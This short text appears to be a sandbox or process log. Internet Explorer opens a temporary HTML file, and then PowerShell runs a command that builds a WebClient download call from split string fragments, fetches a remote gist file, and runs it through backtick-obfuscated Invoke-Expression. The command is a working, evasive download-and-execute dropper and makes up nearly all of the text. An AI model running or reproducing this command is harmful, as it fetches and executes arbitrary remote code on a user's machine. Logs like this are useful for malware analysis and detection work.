iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\JNhUwWi6.html
5292powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''https://gist.githubusercontent.com/1kingspy/af97c0b7658b52f4180c19160c52b767/raw/703ed4925d63aaa92912496452dc8a2f82217db1/gistfile1.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
2776